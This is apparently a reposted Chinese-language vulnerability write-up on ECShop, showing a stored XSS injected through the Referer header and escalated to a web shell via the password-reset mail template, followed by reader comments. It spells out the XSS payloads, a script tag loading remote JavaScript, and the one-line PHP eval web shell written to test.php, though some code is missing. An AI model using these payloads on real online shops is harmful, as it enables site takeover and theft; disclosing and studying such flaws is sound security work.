ecshop过滤不严导致上万网店可被getshell(需一定条件)

文章目录

漏洞作者: Flow

1.includes/lib_main.php过滤不严导致XSS

看代码

取出时也没有过滤,于是产生漏洞

我们来构造一下REFERER

访问首页,构造Referer值为’></graph>”><IMG SRC=” onerror=javascript:alert(‘XSS’)>/

提交,如图,

05185555fbc6f9ae1a48ab8a86c7ca833bda647d

 

管理员查看流量分析时触发,如图

 

05185643eb09e9c2008152e4680d8474b06f9b42

 

05185657079a0a85222776297a2f750eb7bccd19

 

2.打cookie多没意思,咱们getshell吧

构造Referer值为–></script>/

提交

再次构造Referer值为’></graph>”><script src=”http:\\\\127.0.0.1\\demo.js”><!–/

提交(src后面的js地址必须用反斜杠)

demo.js内容为

触发后,会在网店根目录生成一个test.php的文件,内容为<?php @eval($_POST[‘a’]);?>

这里利用的是写php代码到取回密码邮件模板,执行取回密码操作时执行写入的代码

漏洞在includes\cls_template.php的fetch_str()函数

我们可以构造代码到取回邮件模板:

执行取回操作即可绕过过滤执行我们构造的代码

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录

  • 2 Responses to “ecshop过滤不严导致上万网店可被getshell(需一定条件)”
    • 我去

      我测试这个怎么是反射型?本地触 发